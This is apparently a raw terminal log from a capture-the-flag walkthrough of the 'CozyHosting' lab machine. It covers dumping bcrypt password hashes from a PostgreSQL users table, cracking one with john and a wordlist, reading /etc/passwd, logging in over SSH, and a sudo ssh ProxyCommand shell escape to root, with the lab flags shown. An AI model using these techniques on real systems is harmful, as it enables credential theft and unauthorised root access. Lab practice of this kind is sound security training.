
?\dA[+] ?[PATTERN] ? ? ?list access methods
:
?\dAc[+] [AMPTRN [TYPEPTRN]] ?list operator classes
?\dAf[+] [AMPTRN [TYPEPTRN]] ?list operator families
:
?\dAo[+] [AMPTRN [OPFPTRN]] ? list operators of operator families
:

?\dAp[+] [AMPTRN [OPFPTRN]] ? list support functions of operator families
:
?\db[+] ?[PATTERN] ? ? ?list tablespaces
?\dc[S+] [PATTERN] ? ? ?list conversions
:

?\dC[+] ?[PATTERN] ? ? ?list casts
:
?\dd[S] ?[PATTERN] ? ? ?show object descriptions not displayed elsewhere
?\dD[S+] [PATTERN] ? ? ?list domains
:

?\ddp ? ?[PATTERN] ? ? ?list default privileges
:

?\dE[S+] [PATTERN] ? ? ?list foreign tables
?\des[+] [PATTERN] ? ? ?list foreign servers
:
?\det[+] [PATTERN] ? ? ?list foreign tables
?\deu[+] [PATTERN] ? ? ?list user mappings
:








?\dew[+] [PATTERN] ? ? ?list foreign-data wrappers
:
?\df[anptw][S+] [FUNCPTRN [TYPEPTRN ...]]
? ? ? ? ? ? ? ? ? ? ? ? list [only agg/normal/procedure/trigger/window] functio
ns
?\dF[+] ?[PATTERN] ? ? ?list text search configurations
?\dFd[+] [PATTERN] ? ? ?list text search dictionaries
?\dFp[+] [PATTERN] ? ? ?list text search parsers
?\dFt[+] [PATTERN] ? ? ?list text search templates
?\dg[S+] [PATTERN] ? ? ?list roles
?\di[S+] [PATTERN] ? ? ?list indexes
?\dl ? ? ? ? ? ? ? ? ? ?list large objects, same as \lo_list
:quit
cozyhosting-# quit
Use \q to quit.
cozyhosting-# dt
dt
cozyhosting-# \dt
\dt
WARNING: terminal is not fully functional
Press RETURN to continue

? ? ? ? List of relations
Schema | Name ?| Type ?| ?Owner ?
--------+-------+-------+----------
public | hosts | table | postgres
public | users | table | postgres
(2 rows)

(END)
(END)q
cozyhosting-#
cozyhosting-# select * from users;
select * from users;
ERROR: ?syntax error at or near "ls"
LINE 1: ls
? ? ? ?^
cozyhosting=# select * from users;
select * from users;
WARNING: terminal is not fully functional
Press RETURN to continue

? name ? ?| ? ? ? ? ? ? ? ? ? ? ? ? ? password ? ? ? ? ? ? ? ? ? ? ? ? ? | role
?
-----------+--------------------------------------------------------------+-----
--
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin ? ? | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admi
n
(2 rows)

(END)

┌──(kwkl?kwkl)-[~] └─$ john hash2 -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 12 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status

manchesterunited (?) ? ?

1g 0:00:00:11 DONE (2023-10-02 11:27) 0.08756g/s 245.8p/s 245.8c/s 245.8C/s 159159..keyboard Use the "--show" option to display all of the cracked passwords reliably Session completed.

┌──(kwkl?kwkl)-[~]
└─$ vim hash2 ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~]
└─$ john hash2 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?) ? ?
1g 0:00:00:11 DONE (2023-10-02 11:27) 0.08756g/s 245.8p/s 245.8c/s 245.8C/s 159159..keyboard
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~]
└─$ cat hash2 ? ? ? ? ? ? ? ? ? ?
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~]
└─$

app@cozyhosting:/app$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001::/home/app:/bin/sh
postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
josh:x:1003:1003::/home/josh:/usr/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
app@cozyhosting:/app$

User flag:

633400af01adcc71fd0a9174a813847c

┌──(kwkl?kwkl)-[~]
└─$ ssh josh@10.10.11.230 ? ?
The authenticity of host '10.10.11.230 (10.10.11.230)' can't be established.
ECDSA key fingerprint is SHA256:dHlbSOhuGjzTNgvvNbEe2LXI3SsauTGXC/Y5kWTJKs4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.230' (ECDSA) to the list of known hosts.
josh@10.10.11.230's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)

* Documentation: ?https://help.ubuntu.com
* Management: ? ? https://landscape.canonical.com
* Support: ? ? ? ?https://ubuntu.com/advantage

?System information as of Mon Oct ?2 03:32:14 AM UTC 2023

?System load: ? ? ? ? ? 0.0
?Usage of /: ? ? ? ? ? ?53.2% of 5.42GB
?Memory usage: ? ? ? ? ?13%
?Swap usage: ? ? ? ? ? ?0%
?Processes: ? ? ? ? ? ? 239
?Users logged in: ? ? ? 0
?IPv4 address for eth0: 10.10.11.230
?IPv6 address for eth0: dead:beef::250:56ff:feb9:63e0


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Aug 29 09:03:34 2023 from 10.10.14.41
josh@cozyhosting:~$ ls
user.txt
josh@cozyhosting:~$ id
uid=1003(josh) gid=1003(josh) groups=1003(josh)
josh@cozyhosting:~$ cat user.txt
633400af01adcc71fd0a9174a813847c
josh@cozyhosting:~$

josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Sorry, try again.
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
? ?env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
? ?(root) /usr/bin/ssh *
josh@cozyhosting:~$


josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Sorry, try again.
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
? ?env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
? ?(root) /usr/bin/ssh *
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
#
#
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
f1714bfee126c2c7107a6ae26fb22b7d
#

Root flag:f1714bfee126c2c7107a6ae26fb22b7d